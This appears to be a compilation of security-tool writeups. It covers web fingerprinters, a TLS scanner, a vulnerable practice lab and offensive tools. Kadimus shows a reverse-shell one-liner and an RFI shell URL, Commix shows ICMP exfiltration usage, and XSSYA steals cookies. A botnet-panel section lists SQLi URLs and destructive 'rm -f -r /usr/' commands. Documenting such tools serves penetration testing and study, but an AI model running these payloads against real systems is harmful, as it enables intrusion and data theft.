BlindElephant Web Application Fingerprinter

---

---

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

Pre-requisites:

• Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

Get the code:

• Browse SVN
• Checkout via SVN: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant

Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your python installation has distutils, and then do:cd blindelephant/srcsudo python setup.py install(Windows users, omit sudo)

Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$ BlindElephant.py 
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing
                        to attempt to narrow it down (up to numProbes
                        additional requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to attempt to
discover which supported apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com 

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM

Example Usage (Library):

$python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>> 
>>> #Construct the fingerprinter
>>> #use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> #do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version:  4.23-en-COM

The Static File Fingerprinting Approach in One Picture

Other Projects Like This

• Sucuri Static File Fingerprinting tool: Initial web-based proof of concept for the static file approach
• WAFP: The Web Application FingerPrinter: Ruby implementation of the static file concept (fetches all possible static files)
• Morningstar Security WhatWeb: Hybrid approach supporting a huge variety of remote technologies. Primarily regex based, but uses static files to differentiate versions of some apps.

---

More information about BlindElephant can be found on: http://blindelephant.sourceforge.net

---

---

Exploit – Several Botnet(s) Vulnerabilities

Exploit – Several Botnet(s) Vulnerabilities!

BotNets are Mainly Created by Great Scripters, but some of them really LACK on Security!
A recent report made to siph0n.in by abdilo and asterea (@4sterea) identified How Un-Secure the Most Recent Botnets are!

Let’s give a look into it!

(1) BotNet is Vulnerable to Sh3ll Upload Vulnerability

iBanking

Type: Shell Upload

Sh3ll: *(2)

(18) BotNets are VULNERABLE to SQL Injection:

 Random panel

Type: SQLi
Vuln: http://site.com/g.php?id=1

 Athena

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD &ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now

Casinoloader

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1

 Citadel

Type: SQLi
Vuln: http://localhost/cp.php?bots=1

DLOADER

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1
Vuln2: http://localhost/includes/update_url.php?fid=1

HERPES

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1

JACKPOS

blindsqli after you login, pretty useless so i wont bother.

JHTTP

Some sqlinjection vulnerabilities past the assets folder.

SAKURA

Type: SQLi

http://localhost/func.php?showtopic=2 http://localhost/index.php?showtopic=322 http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312 http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10 http://localhost/showthread.php?t=123 http://localhost/showthread.php?t=23&cmd=32

Type: SQLi – POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123 http://localhost/sakuraadmin44.php?threads=21 POST: snick=1

SILENCE WINLOCKER V5.0

SQL injection.

http://localhost/forma.php?pin=4322 http://localhost/index.php?x=1&act=delete&id=1 http://localhost/picture.php?pin=8787 http://localhost/tmp/get.php?pin=1334

SMOKE LOADER

Type: SQLi

http://localhost/control.php?id=1 http://localhost/guest.php?id=1

POST

SOLARBOT

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD

SPY-EYE

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998

TINBA

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate

UMBRA

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1

VERTEXNET

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.

ZEUS AND ZEUS EVO

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8

ZSKIMMER

Type: SQLi

Vuln: http://localhost/process.php?xy=2

(3) BotNets are VULNERABLE to Cross-Site Scripting Vulnerability and Other Medium Issues:

CYTHOSIA BOTNET

Type: Stored XSS and iFrame redirect

Click add task Command: IFRAME SRC=”whateverekorlemonpartyorwhatnot.com” /IFRAME

Then Click Create Task Finally click Tasks. VOILA!

(Credits to asterea for finding this botnet panel)

CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

PLASMA

Some Cross site scripting vulns and nothing else so no use telling you about them.

Furthermore they have also identified (5) Secure Sh3lls :-)

Here you all can find the Secure Ones!

 Alin1

Nothing, unless logged in.

 Betabot

Nope.

 CRIMEPACK 3.1.3

Secure shit, like no XSS’s or anything.

SMSBOT

nothing interesting.

SPY POSCARDSTEALER

nope its secure.

---

If you all find any new Vulnerability, you can directly contact them below!

Contact: asterea@exploit.im

Twitter: 4sterea

---

(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv

Nettool.sh – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks

Nettool.sh  – Automate frameworks For Nmap, Driftnet, Sslstrip, Metasploit And Ettercap MITM Attacks.

Netool.sh toolkit provides a fast and easy way For new arrivals to IT security pentesting and also to experience users to use allmost all features that the Man-In-The-Middle can provide under local lan, since scanning, sniffing and Social engineering attacks “[spear phishing attacks]”…

Netool its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet), also uses macchanger to decoy scans changing the mac address.

Operative Systems Supported are:
Linux-ubuntu, kali-linux, backtack-linux (un-continued), freeBSD, Mac osx (un-continued)

Rootsector module allows you to automate some attacks over DNS_SPOOF + MitM (phishing – social engineering) using metasploit, apache2 and ettercap frameworks. Like the generation of payloads, shellcode, backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage. recent as introducted the scanner inurlbr (by cleiton). This tool brought to you by: peterubuntu10

Video:

---

More information can be found at: http://sourceforge.net/projects/netoolsh

BTS PenTesting Lab – Open Source vulnerable Web Application Platform

BTS PenTesting Lab – Open Source vulnerable Web Application Platform.

Are you a Penetration Tester, an Information Security Specialist and/or simply a Learner in Cyber Security?

This might be the right Pentesting Platform for perform your Penetratration Tests and Upgrade your Skillz! This is BTS Pentesting Lab an Open Source vulnerable Web Application Platform developed by Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to perform and learn all about many different types of web application vulnerabilities.

Currently, the App Contains the following Types of Vulnerabilities:

*SQL Injection

*XSS (includes Flash Based xss)

*CSRF

*Clickjacking

*SSRF

*File Inclusion

*Code Execution

*Insecure Direct Object Reference

*Unrestricted File Upload vulnerability

*Open URL Redirection

*Server Side Includes(SSI) Injection

and more…

---

More information can be found at: http://sourceforge.net/projects/btslab

XSSYA V-2.0 For Cross Site Scripting Vulnerability Confirmation Written In Python

XSSYA-V-2.0 (XSS Vulnerability Confirmation )

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods) • Method number 1 for Confirmation Request and Response • Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded • Support HTTPS • After Confirmation (execute payload to get cookies) • Identify 3 Types of WAF (Mod_Security – WebKnight – F5 BIG IP) • Can be run in (Windows – Linux) XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal $ Python xssya.py Example $ Python xssya.py http://www.domain.com/ http://www.domain.com= http://www.domain.com?

• What have been changed? (XSSYA v 2.0 has more payloads; library contains 41 payloads to enhance detection level XSS scanner is now removed from XSSYA to reduce false positive URLs to be tested used to not allow any character at the end of the URL except (/ – = -?) but now this limitation has been removed

• What’s new in XSSYA V2.0 ? Custom Payload 1 – You have the ability to Choose your Custom Payload Ex: and you can encode your custom payload with different types of encodings like (B64 – HEX – URL_Encode –- HEX with Semi Columns)

(HTML Entities à Single & Double Quote only – brackets – And – or Encode all payload with HTML Entities) This feature will support also XSS vulnerability confirmation method which is you choose you custom payload and custom Encoding execute if response 200 check for same payload decoded in HTM code page.

• What’s new in XSSYA V2.0? HTML5 Payloads XSYSA V2.0 contains a library of 44 HTLM5 payloads

• What’s New in XSSYA V 2.0?

XSSYA have a Library for the most vulnerable application with XSS – Cross site scripting and this library counting (Apache – WordPress – PHPmy Admin) If you choose apache application it give the CVE Number version of Apache which is affected and the link for CVE for more details so it will be easy to search for certain version that is affected with XSS

• What’s New in XSSYA V 2.0? XSSYA has the feature to convert the IP address of the attacker to (Hex, Dword, Octal) to bypass any security mechanism or IPS that will be exist on the target Domain

• What’s New in XSSYA V 2.0?

XSSYA check is the target is Vulnerable to XST (Cross Site Trace) which it sends custom Trace Request and check if the target domain is Vulnerable the request will be like this:

TRACE / HTTP/1.0 Host: demo.testfire.net Header1: < script >alert(document.cookie);

The Module need to be downloaded is colorama-0.2.7 https://pypi.python.org/pypi/colorama gdshortener 0.0.2 https://pypi.python.org/pypi/gdshortener

---

More information can be found at: https://github.com/yehia-mamdouh/XSSYA-V-2.0

Kadimus For LFI / RFI Scan And Exploit Tool

Kadimus

LFI Scan & Exploit Tool

Kadimus is a tool to check sites to lfi vulnerability , and also exploit it

Features:

• Check all url parameters
• /var/log/auth.log RCE
• /proc/self/environ RCE
• php://input RCE
• data://text RCE
• Source code disclosure
• Multi thread scanner
• Command shell interface through HTTP Request
• Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
• Proxy socks5 support for bind connections

Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus

You can run the configure file:

./configure

Or follow this steps:

Installing libcurl:

• CentOS/Fedora

# yum install libcurl-devel

• Debian based

# apt-get install libcurl4-openssl-dev

Installing libpcre:

• CentOS/Fedora

# yum install pcre-devel

• Debian based

# apt-get install libpcre3-dev

Installing libssh:

• CentOS/Fedora

# yum install libssh-devel

• Debian based

# apt-get install libssh-dev

And finally:

$ make

Options:

  -h, --help                    Display this help menu

  Request:
    -B, --cookie STRING         Set custom HTTP Cookie header
    -A, --user-agent STRING     User-Agent to send to server
    --connect-timeout SECONDS   Maximum time allowed for connection
    --retry-times NUMBER        number of times to retry if connection fails
    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port

  Scanner:
    -u, --url STRING            Single URI to scan
    -U, --url-list FILE         File contains URIs to scan
    -o, --output FILE           File to save output results
    --threads NUMBER            Number of threads (2..1000)

  Explotation:
    -t, --target STRING         Vulnerable Target to exploit
    --injec-at STRING           Parameter name to inject exploit
                                (only need with RCE data and source disclosure)

  RCE:
    -X, --rce-technique=TECH    LFI to RCE technique to use
    -C, --code STRING           Custom PHP code to execute, with php brackets
    -c, --cmd STRING            Execute system command on vulnerable target system
    -s, --shell                 Simple command shell interface through HTTP Request

    -r, --reverse-shell         Try spawn a reverse shell connection.
    -l, --listen NUMBER         port to listen

    -b, --bind-shell            Try connect to a bind-shell
    -i, --connect-to STRING     Ip/Hostname to connect
    -p, --port NUMBER           Port number to connect
    --b-proxy STRING            IP/Hostname of socks5 proxy
    --b-port NUMBER             Port number of socks5 proxy

    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)
    --ssh-target STRING         Set the SSH Host

    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ
      input                     Try run PHP Code using php://input
      auth                      Try run PHP Code using /var/log/auth.log
      data                      Try run PHP Code using data://text

    Source Disclosure:
      -G, --get-source          Try get the source files using filter://
      -f, --filename STRING     Set filename to grab source [REQUIRED]
      -O FILE                   Set output file (Default: stdout)

Examples:

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Get source code of file:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

Execute php code:

./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input

Execute command:

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for RFI:

You can also check for RFI errors, just put the remote url on resource/common_files.txt and the regex to identify this, example:

/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

in file:

http://bad-url.com/shell.txt?:scorpion say get over here

Reverse shell:

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0

---

More information can be found at: https://github.com/P0cL4bs/Kadimus

Commix – An Command Injection Exploiter To Test And Find Web Application Bugs

   ___    ___     ___ ___     ___ ___ /\_\   __  _ 
  /'___\ / __`\ /' __` __`\ /' __` __`\/\ \ /\ \/'\
 /\ \__//\ \L\ \/\ \/\ \/\ \/\ \/\ \/\ \ \ \\/>  </
 \ \____\ \____/\ \_\ \_\ \_\ \_\ \_\ \_\ \_\/\_/\_\
  \/____/\/___/  \/_/\/_/\/_/\/_/\/_/\/_/\/_/\//\/_/ { v0.1b }

+--
Automated All-in-One OS Command Injection and Exploitation Tool
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst)
+--

General Information

Commix (short for [comm]and [i]njection e[x]ploiter) has a simple environment and it can be used, from web developers, penetration testers or even security researchers to test web applications with the view to find bugs, errors or vulnerabilities related to command injection attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or string. Commix is written in Python programming language.

Disclaimer

The tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes!!

Requirements

Python version 2.6.x or 2.7.x is required for running this program.

Installation

Commix comes pre-installed on the following Linux distributions:

• BlackArch

Download commix by cloning the Git repository:

git clone https://github.com/stasinopoulos/commix.git commix

Usage

Usage: python commix.py [options]

Options

-h, --help            Show help and exit.
--verbose             Enable the verbose mode.
--install             Install 'commix' to your system.
--version             Show version number and exit.
--update              Check for updates (apply if any) and exit.

Target

This options has to be provided, to define the target URL.

--url=URL           Target URL
--url-reload        Reload target URL after command execution.

Request

These options can be used, to specify how to connect to the target
URL.

--host=HOST         HTTP Host header.
--referer=REFERER   HTTP Referer header.
--user-agent=AGENT  HTTP User-Agent header.
--cookie=COOKIE     HTTP Cookie header.
--random-agent      Use a randomly selected HTTP User-Agent header.
--headers=HEADERS   Extra headers (e.g. 'Header1:Value1\nHeader2:Value2').
--proxy=PROXY       Use a HTTP proxy (e.g. '127.0.0.1:8080').
--auth-url=AUTH_..  Login panel URL.
--auth-data=AUTH..  Login parameters and data.
--auth-cred=AUTH..  HTTP Basic Authentication credentials (e.g.
                    'admin:admin').

Enumeration

These options can be used, to enumerate the target host.

--current-user  Retrieve current user.
--hostname      Retrieve server hostname.
--is-root       Check if the current user have root privs.
--sys-info      Retrieve system information.

Injection

These options can be used, to specify which parameters to inject and
to provide custom injection payloads.

--data=DATA         POST data to inject (use 'INJECT_HERE' tag to specify
                    the testable parameter).
--suffix=SUFFIX     Injection payload suffix string.
--prefix=PREFIX     Injection payload prefix string.
--technique=TECH    Specify a certain injection technique : 'classic',
                    'eval-based', 'time-based' or 'file-based'.
--maxlen=MAXLEN     The length of the output on time-based technique
                    (Default: 10000 chars).
--delay=DELAY       Set Time-delay for time-based and file-based
                    techniques (Default: 1 sec).
--base64            Use Base64 (enc)/(de)code trick to prevent false-
                    positive results.
--tmp-path=TMP_P..  Set remote absolute path of temporary files directory.
--root-dir=SRV_R..  Set remote absolute path of web server's root
                    directory (Default: /var/www/).
--icmp-exfil=IP_..  Use the ICMP exfiltration technique (e.g.
                    'ip_src=192.168.178.1,ip_dst=192.168.178.3').
--alter-shell       Use an alternative os-shell (Python). Available only
                    for 'tempfile-based' injections.
--os-shell=OS_SH..  Execute a single operating system command.

Usage Examples

Exploiting Damn Vulnerable Web App:

python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=INJECT_HERE&submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

Exploiting php-Charts 1.0 using injection payload suffix & prefix string:

python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE" --prefix="'" --suffix="//"

Exploiting OWASP Mutillidae using extra headers and HTTP proxy:

python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=INJECT_HERE" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

Exploiting Persistence using ICMP exfiltration technique :

su -c "python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8""

Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:

python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=INJECT_HERE&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="file-based" --root-dir="/"

Command injection testbeds

A collection of pwnable VMs, that includes web apps vulnerable to command injections.

• Damn Vulnerable Web App
• OWASP: Mutillidae
• bWAPP: bee-box (v1.6)
• Persistence
• Pentester Lab: Web For Pentester
• Pentester Academy: Command Injection ISO: 1
• SpiderLabs: MCIR (ShelLOL)
• Kioptrix: 2014 (#5)
• w3af-moth
• […]

Exploitation Demos

• Exploiting DVWA
• Exploiting bWAPP

---

More information can be found at: https://github.com/stasinopoulos/commix

Kunai – A Tool For Pwning And Info Gathering via User Browser

Kunai 0.2

Sometimes there is a need to obtain ip address of specific person or perform client-side attacks via user browser. This is what you need in such situations.

Kunai is a simple script which collects many informations about a visitor and saves output to file; furthermore, you may try to perform attacks on user browser, using beef or metasploit.

In order to grab as many informations as possible, script detects whenever javascript is enabled to obtain more details about a visitor. For example, you can include this script in iframe, or perform redirects, to avoid detection of suspicious activities. Script can notify you via email about user that visit your script. Whenever someone will visit your hook (kunai), output fille will be updated.

Functions

• Stores informations about users in elegant output
• Website spoofing
• Redirects
• BeEF & Metasploit compatibility
• Email notification
• Diffrent reaction for javascript disabled browser
• One file composition

Example configs

• Website spoofing (more stable & better for autopwn & beef):
• Redirect (better for quick ip catching):

goo.gl/urlink -> evilhost/x.php -> site.com/kitty.png

• Cross Site Scripting (inclusion)

Screens

• http://i.imgur.com/cScbarL.png
• http://i.imgur.com/WOM3uyi.png

---

More information can be found on: https://github.com/Smaash/kunai

CipherScan – A very simple way to find out which SSL ciphersuites are supported by a target

CipherScan

$ ./cipherscan jve.linuxwall.info
........................
Target: jve.linuxwall.info:443

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-384,384bits  secp384r1
2     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-384,384bits  secp384r1
3     DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,2048bits         None
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,2048bits         None
5     ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-384,384bits  secp384r1
6     ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
7     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-384,384bits  secp384r1
8     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-384,384bits  secp384r1
9     DHE-RSA-AES128-SHA256        TLSv1.2                DH,2048bits         None
10    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
11    DHE-RSA-AES256-SHA256        TLSv1.2                DH,2048bits         None
12    DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
13    AES128-GCM-SHA256            TLSv1.2                None                None
14    AES256-GCM-SHA384            TLSv1.2                None                None
15    AES128-SHA256                TLSv1.2                None                None
16    AES256-SHA256                TLSv1.2                None                None
17    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
18    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
19    DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
20    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
21    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,2048bits         None
22    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
23    DES-CBC3-SHA                 TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha256WithRSAEncryption signature
TLS ticket lifetime hint: 300
OCSP stapling: supported
Cipher ordering: server

Cipherscan tests the ordering of the SSL/TLS ciphers on a given target, for all major versions of SSL and TLS. It also extracts some certificates informations, TLS options, OCSP stapling and more. Cipherscan is a wrapper above the openssl s_client command line.

Cipherscan is meant to run on all flavors of unix. It ships with its own built of OpenSSL for Linux/64 and Darwin/64. On other platform, it will use the openssl version provided by the operating system (which may have limited ciphers support), or your own version provided in the -o command line flag.

Examples

Basic test:

$ ./cipherscan google.com
...................
Target: google.com:443

prio  ciphersuite                  protocols                    pfs                 curves
1     ECDHE-RSA-CHACHA20-POLY1305  TLSv1.2                      ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                      ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES128-SHA         TLSv1.1,TLSv1.2              ECDH,P-256,256bits  prime256v1
4     ECDHE-RSA-RC4-SHA            SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
5     AES128-GCM-SHA256            TLSv1.2                      None                None
6     AES128-SHA256                TLSv1.2                      None                None
7     AES128-SHA                   TLSv1.1,TLSv1.2              None                None
8     RC4-SHA                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
9     RC4-MD5                      SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
10    ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                      ECDH,P-256,256bits  prime256v1
11    ECDHE-RSA-AES256-SHA384      TLSv1.2                      ECDH,P-256,256bits  prime256v1
12    ECDHE-RSA-AES256-SHA         SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
13    AES256-GCM-SHA384            TLSv1.2                      None                None
14    AES256-SHA256                TLSv1.2                      None                None
15    AES256-SHA                   SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None
16    ECDHE-RSA-AES128-SHA256      TLSv1.2                      ECDH,P-256,256bits  prime256v1
17    ECDHE-RSA-DES-CBC3-SHA       SSLv3,TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
18    DES-CBC3-SHA                 SSLv3,TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: trusted, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: 100800
OCSP stapling: not supported
Cipher ordering: server

Testing STARTTLS:

darwin$ $ ./cipherscan --curves -starttls xmpp jabber.ccc.de:5222
................................
Target: jabber.ccc.de:5222

prio  ciphersuite                  protocols              pfs                 curves
1     ECDHE-RSA-AES256-GCM-SHA384  TLSv1.2                ECDH,P-256,256bits  prime256v1
2     ECDHE-RSA-AES256-SHA384      TLSv1.2                ECDH,P-256,256bits  prime256v1
3     ECDHE-RSA-AES256-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
4     DHE-RSA-AES256-GCM-SHA384    TLSv1.2                DH,1024bits         None
5     DHE-RSA-AES256-SHA256        TLSv1.2                DH,1024bits         None
6     DHE-RSA-AES256-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
7     DHE-RSA-CAMELLIA256-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
8     AES256-GCM-SHA384            TLSv1.2                None                None
9     AES256-SHA256                TLSv1.2                None                None
10    AES256-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
11    CAMELLIA256-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None
12    ECDHE-RSA-AES128-GCM-SHA256  TLSv1.2                ECDH,P-256,256bits  prime256v1
13    ECDHE-RSA-AES128-SHA256      TLSv1.2                ECDH,P-256,256bits  prime256v1
14    ECDHE-RSA-AES128-SHA         TLSv1,TLSv1.1,TLSv1.2  ECDH,P-256,256bits  prime256v1
15    DHE-RSA-AES128-GCM-SHA256    TLSv1.2                DH,1024bits         None
16    DHE-RSA-AES128-SHA256        TLSv1.2                DH,1024bits         None
17    DHE-RSA-AES128-SHA           TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
18    DHE-RSA-SEED-SHA             TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
19    DHE-RSA-CAMELLIA128-SHA      TLSv1,TLSv1.1,TLSv1.2  DH,1024bits         None
20    AES128-GCM-SHA256            TLSv1.2                None                None
21    AES128-SHA256                TLSv1.2                None                None
22    AES128-SHA                   TLSv1,TLSv1.1,TLSv1.2  None                None
23    SEED-SHA                     TLSv1,TLSv1.1,TLSv1.2  None                None
24    CAMELLIA128-SHA              TLSv1,TLSv1.1,TLSv1.2  None                None

Certificate: UNTRUSTED, 2048 bit, sha1WithRSAEncryption signature
TLS ticket lifetime hint: None
OCSP stapling: not supported
Cipher ordering: client
Curves ordering: server
Curves fallback: False

Exporting to JSON with the -j command line option:

$ ./cipherscan --curves -j www.ebay.com | j
{
    "curves_fallback": "False",
    "serverside": "True",
    "target": "www.ebay.com:443",
    "utctimestamp": "2015-04-03T14:54:31.0Z",
    "ciphersuite": [
        {
            "cipher": "AES256-SHA",
            "ocsp_stapling": "False",
            "pfs": "None",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        },
        {
            "cipher": "ECDHE-RSA-DES-CBC3-SHA",
            "curves": [
                "prime256v1",
                "secp384r1",
                "secp224r1",
                "secp521r1"
            ],
            "curves_ordering": "server",
            "ocsp_stapling": "False",
            "pfs": "ECDH,P-256,256bits",
            "protocols": [
                "TLSv1",
                "TLSv1.1",
                "TLSv1.2"
            ],
            "pubkey": [
                "2048"
            ],
            "sigalg": [
                "sha1WithRSAEncryption"
            ],
            "ticket_hint": "None",
            "trusted": "True"
        }
    ]
}

Analyzing configurations

The motivation behind cipherscan is to help operators configure good TLS on their endpoints. To help this further, the script analyze.py compares the results of a cipherscan with the TLS guidelines from https://wiki.mozilla.org/Security/Server_Side_TLS and output a level and recommendations.

$ ./analyze.py -t jve.linuxwall.info
jve.linuxwall.info:443 has intermediate tls

Changes needed to match the old level:
* consider enabling SSLv3
* add cipher DES-CBC3-SHA
* use a certificate with sha1WithRSAEncryption signature
* consider enabling OCSP Stapling

Changes needed to match the intermediate level:
* consider enabling OCSP Stapling

Changes needed to match the modern level:
* remove cipher AES128-GCM-SHA256
* remove cipher AES256-GCM-SHA384
* remove cipher AES128-SHA256
* remove cipher AES128-SHA
* remove cipher AES256-SHA256
* remove cipher AES256-SHA
* disable TLSv1
* consider enabling OCSP Stapling

In the output above, analyze.py indicates that the target jve.linuxwall.info matches the intermediate configuration level. If the administrator of this site wants to reach the modern level, the items that failed under the modern tests should be corrected.

analyze.py does not make any assumption on what a good level should be. Sites operators should now what level they want to match against, based on the compatibility level they want to support. Again, refer to https://wiki.mozilla.org/Security/Server_Side_TLS for more information.

Note on Nagios mode: analyse.py can be ran as a nagios check with --nagios. The exit code will then represent the state of the configuration:

• 2 (critical) for bad tls
• 1 (warning) if it doesn’t match the desired level
